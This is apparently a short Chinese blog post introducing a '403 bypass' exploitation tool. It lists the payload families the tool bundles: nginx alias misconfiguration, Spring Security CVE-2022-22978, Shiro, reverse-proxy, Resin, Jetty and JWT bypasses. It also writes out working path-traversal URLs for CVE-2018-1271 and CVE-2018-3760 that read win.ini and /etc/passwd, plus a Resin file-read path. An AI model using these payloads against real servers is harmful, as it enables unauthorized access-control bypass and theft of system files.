bypass 403 利用工具

前言:bypass 403 利用工具

集成payload

nginx alias配置不当

CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过

X

CVE-2018-1271

http://0:8080/spring-rabbit-stock/static/%255c%255c%255c%255c%255c
%255c..%255c..%255c..%255c..%255c..%255c..%255c/Windows/win.ini

CVE-2018-3760

http://127.0.0.1:3000/assets/file:%2f%2f/app/assets/images
/%252e%252e/%252e%252e/%252e%252e/etc/passwd

shiro bypass permission bypass

参考文章:https://www.cnblogs.com/zpchcbd/p/15023056.html

reverse proxy architecture permission bypass

resin 4.0.65 windows任意文件读取

http://localhost:8080/t1/test.jsp.;xxxx

jetty CVE-2021-28164 CVE-2021-34429 任意文件读取

jwt

posted @ 2023-01-22 14:27  zpchcbd  阅读(416)  评论(0编辑  收藏  举报